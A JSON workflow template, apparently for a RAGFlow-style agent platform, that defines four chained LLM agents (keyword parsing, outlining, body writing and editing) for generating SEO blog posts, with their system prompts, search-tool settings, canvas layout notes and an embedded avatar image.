                                "sys_prompt": "# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
                                "temperature": 0.2,
                                "temperatureEnabled": true,
                                "tools": [],
                                "topPEnabled": false,
                                "top_p": 0.75,
                                "user_prompt": "",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Parse And Keyword Agent"
                        },
                        "dragging": false,
                        "id": "Agent:ClearRabbitsScream",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 344.7766966202233,
                            "y": 234.82202253184496
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.3,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 3,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Balance",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.2,
                                "prompts": [
                                    {
                                        "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
                                        "role": "user"
                                    }
                                ],
                                "sys_prompt": "# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n  - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n  - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
                                "temperature": 0.5,
                                "temperatureEnabled": true,
                                "tools": [
                                    {
                                        "component_name": "TavilySearch",
                                        "name": "TavilySearch",
                                        "params": {
                                            "api_key": "",
                                            "days": 7,
                                            "exclude_domains": [],
                                            "include_answer": false,
                                            "include_domains": [],
                                            "include_image_descriptions": false,
                                            "include_images": false,
                                            "include_raw_content": true,
                                            "max_results": 5,
                                            "outputs": {
                                                "formalized_content": {
                                                    "type": "string",
                                                    "value": ""
                                                },
                                                "json": {
                                                    "type": "Array<Object>",
                                                    "value": []
                                                }
                                            },
                                            "query": "sys.query",
                                            "search_depth": "basic",
                                            "topic": "general"
                                        }
                                    }
                                ],
                                "topPEnabled": false,
                                "top_p": 0.85,
                                "user_prompt": "",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Outline Agent"
                        },
                        "dragging": false,
                        "id": "Agent:BetterSitesSend",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 613.4368763415628,
                            "y": 164.3074269048589
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "description": "This is an agent for a specific task.",
                                "user_prompt": "This is the order you need to send to the agent."
                            },
                            "label": "Tool",
                            "name": "flow.tool_0"
                        },
                        "dragging": false,
                        "id": "Tool:SharpPensBurn",
                        "measured": {
                            "height": 44,
                            "width": 200
                        },
                        "position": {
                            "x": 580.1877078861457,
                            "y": 287.7669662022325
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "toolNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.5,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 5,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Precise",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.5,
                                "prompts": [
                                    {
                                        "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}",
                                        "role": "user"
                                    }
                                ],
                                "sys_prompt": "# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
                                "temperature": 0.2,
                                "temperatureEnabled": true,
                                "tools": [
                                    {
                                        "component_name": "TavilySearch",
                                        "name": "TavilySearch",
                                        "params": {
                                            "api_key": "",
                                            "days": 7,
                                            "exclude_domains": [],
                                            "include_answer": false,
                                            "include_domains": [],
                                            "include_image_descriptions": false,
                                            "include_images": false,
                                            "include_raw_content": true,
                                            "max_results": 5,
                                            "outputs": {
                                                "formalized_content": {
                                                    "type": "string",
                                                    "value": ""
                                                },
                                                "json": {
                                                    "type": "Array<Object>",
                                                    "value": []
                                                }
                                            },
                                            "query": "sys.query",
                                            "search_depth": "basic",
                                            "topic": "general"
                                        }
                                    }
                                ],
                                "topPEnabled": false,
                                "top_p": 0.75,
                                "user_prompt": "",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Body Agent"
                        },
                        "dragging": false,
                        "id": "Agent:EagerNailsRemain",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 889.0614605692713,
                            "y": 247.00973041799065
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "description": "This is an agent for a specific task.",
                                "user_prompt": "This is the order you need to send to the agent."
                            },
                            "label": "Tool",
                            "name": "flow.tool_1"
                        },
                        "dragging": false,
                        "id": "Tool:WickedDeerHeal",
                        "measured": {
                            "height": 44,
                            "width": 200
                        },
                        "position": {
                            "x": 853.2006404239659,
                            "y": 364.37541577229143
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "toolNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.5,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 5,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Precise",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.5,
                                "prompts": [
                                    {
                                        "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
                                        "role": "user"
                                    }
                                ],
                                "sys_prompt": "# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
                                "temperature": 0.2,
                                "temperatureEnabled": true,
                                "tools": [],
                                "topPEnabled": false,
                                "top_p": 0.75,
                                "user_prompt": "",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Editor Agent"
                        },
                        "dragging": false,
                        "id": "Agent:LovelyHeadsOwn",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 1160.3332919804993,
                            "y": 149.50806732882472
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "content": [
                                    "{Agent:LovelyHeadsOwn@content}"
                                ]
                            },
                            "label": "Message",
                            "name": "Response"
                        },
                        "dragging": false,
                        "id": "Message:LegalBeansBet",
                        "measured": {
                            "height": 56,
                            "width": 200
                        },
                        "position": {
                            "x": 1370.6665839609984,
                            "y": 267.0323933738015
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "messageNode"
                    },
                    {
                        "data": {
                            "form": {
                                "text": "This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don\u2019t need any writing experience. Just provide a topic or short request \u2014 the system will handle the rest.\n\nThe process includes the following key stages:\n\n1. **Understanding your topic and goals**\n2. **Designing the blog structure**\n3. **Writing high-quality content**\n\n\n"
                            },
                            "label": "Note",
                            "name": "Workflow Overall Description"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 205,
                        "id": "Note:SlimyGhostsWear",
                        "measured": {
                            "height": 205,
                            "width": 415
                        },
                        "position": {
                            "x": -284.3143151688742,
                            "y": 150.47632147913419
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 415
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis agent reads the user\u2019s input and figures out what kind of blog needs to be written.\n\n**What it does**:\n- Understands the main topic you want to write about  \n- Identifies who the blog is for (e.g., beginners, marketers, developers)  \n- Determines the writing purpose (e.g., SEO traffic, product promotion, education)  \n- Suggests 3\u20135 long-tail SEO keywords related to the topic"
                            },
                            "label": "Note",
                            "name": "Parse And Keyword Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 152,
                        "id": "Note:EmptyChairsShake",
                        "measured": {
                            "height": 152,
                            "width": 340
                        },
                        "position": {
                            "x": 295.04147626768133,
                            "y": 372.2755718118446
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 340
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis agent builds the blog structure \u2014 just like writing a table of contents before you start writing the full article.\n\n**What it does**:\n- Suggests a clear blog title that includes important keywords  \n- Breaks the article into sections using H2 and H3 headings (like a professional blog layout)  \n- Assigns 1\u20132 recommended keywords to each section to help with SEO  \n- Follows the writing goal and target audience set in the previous step"
                            },
                            "label": "Note",
                            "name": "Outline Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 146,
                        "id": "Note:TallMelonsNotice",
                        "measured": {
                            "height": 146,
                            "width": 343
                        },
                        "position": {
                            "x": 598.5644991893463,
                            "y": 5.801054564756448
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 343
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis agent is responsible for writing the actual content of the blog \u2014 paragraph by paragraph \u2014 based on the outline created earlier.\n\n**What it does**:\n- Looks at each H2/H3 section in the outline  \n- Writes 150\u2013220 words of clear, helpful, and well-structured content per section  \n- Includes the suggested SEO keywords naturally (not keyword stuffing)  \n- Uses real examples or facts if needed (by calling a web search tool like Tavily)"
                            },
                            "label": "Note",
                            "name": "Body Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 137,
                        "id": "Note:RipeCougarsBuild",
                        "measured": {
                            "height": 137,
                            "width": 319
                        },
                        "position": {
                            "x": 860.4854129814981,
                            "y": 427.2196835690842
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 319
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis agent reviews the entire blog draft to make sure it is smooth, professional, and SEO-friendly. It acts like a human editor before publishing.\n\n**What it does**:\n- Polishes the writing: improves sentence clarity, fixes awkward phrasing  \n- Makes sure the content flows well from one section to the next  \n- Double-checks keyword usage: are they present, natural, and not overused?  \n- Verifies the blog structure (H1, H2, H3 headings) is correct  \n- Adds two key SEO elements:\n  - **Meta Title** (shows up in search results)\n  - **Meta Description** (summary for Google and social sharing)"
                            },
                            "label": "Note",
                            "name": "Editor Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "height": 146,
                        "id": "Note:OpenTurkeysSell",
                        "measured": {
                            "height": 146,
                            "width": 320
                        },
                        "position": {
                            "x": 1129,
                            "y": -30
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 320
                    }
                ]
            },
            "history": [],
            "messages": [],
            "path": [],
            "retrieval": []
        },
    "avatar": "data:image/jpeg;base64,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"
 }
--- a/agent/templates/seo_blog.json
+++ b/agent/templates/seo_blog.json
@ -0,0 +1,915 @@
 {
    "id": 4,
    "title": "Generate SEO Blog",
    "description": "This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don’t need any writing experience. Just provide a topic or short request — the system will handle the rest.",
    "canvas_type": "Recommended",
    "dsl": {
            "components": {
                "Agent:BetterSitesSend": {
                    "downstream": [
                        "Agent:EagerNailsRemain"
                    ],
                    "obj": {
                        "component_name": "Agent",
                        "params": {
                            "delay_after_error": 1,
                            "description": "",
                            "exception_comment": "",
                            "exception_default_value": "",
                            "exception_goto": [],
                            "exception_method": null,
                            "frequencyPenaltyEnabled": false,
                            "frequency_penalty": 0.3,
                            "llm_id": "deepseek-chat@DeepSeek",
                            "maxTokensEnabled": false,
                            "max_retries": 3,
                            "max_rounds": 3,
                            "max_tokens": 4096,
                            "mcp": [],
                            "message_history_window_size": 12,
                            "outputs": {
                                "content": {
                                    "type": "string",
                                    "value": ""
                                }
                            },
                            "parameter": "Balance",
                            "presencePenaltyEnabled": false,
                            "presence_penalty": 0.2,
                            "prompts": [
                                {
                                    "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
                                    "role": "user"
                                }
                            ],
                            "sys_prompt": "# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n  - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n  - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
                            "temperature": 0.5,
                            "temperatureEnabled": true,
                            "tools": [
                                {
                                    "component_name": "TavilySearch",
                                    "name": "TavilySearch",
                                    "params": {
                                        "api_key": "",
                                        "days": 7,
                                        "exclude_domains": [],
                                        "include_answer": false,
                                        "include_domains": [],
                                        "include_image_descriptions": false,
                                        "include_images": false,
                                        "include_raw_content": true,
                                        "max_results": 5,
                                        "outputs": {
                                            "formalized_content": {
                                                "type": "string",
                                                "value": ""
                                            },
                                            "json": {
                                                "type": "Array<Object>",
                                                "value": []
                                            }
                                        },
                                        "query": "sys.query",
                                        "search_depth": "basic",
                                        "topic": "general"
                                    }
                                }
                            ],
                            "topPEnabled": false,
                            "top_p": 0.85,
                            "user_prompt": "",
                            "visual_files_var": ""
                        }
                    },
                    "upstream": [
                        "Agent:ClearRabbitsScream"
                    ]
                },
                "Agent:ClearRabbitsScream": {
                    "downstream": [
                        "Agent:BetterSitesSend"
                    ],
                    "obj": {
                        "component_name": "Agent",
                        "params": {
                            "delay_after_error": 1,
                            "description": "",
                            "exception_comment": "",
                            "exception_default_value": "",
                            "exception_goto": [],
                            "exception_method": null,
                            "frequencyPenaltyEnabled": false,
                            "frequency_penalty": 0.5,
                            "llm_id": "deepseek-chat@DeepSeek",
                            "maxTokensEnabled": false,
                            "max_retries": 3,
                            "max_rounds": 1,
                            "max_tokens": 4096,
                            "mcp": [],
                            "message_history_window_size": 12,
                            "outputs": {
                                "content": {
                                    "type": "string",
                                    "value": ""
                                }
                            },
                            "parameter": "Precise",
                            "presencePenaltyEnabled": false,
                            "presence_penalty": 0.5,
                            "prompts": [
                                {
                                    "content": "The user query is {sys.query}",
                                    "role": "user"
                                }
                            ],
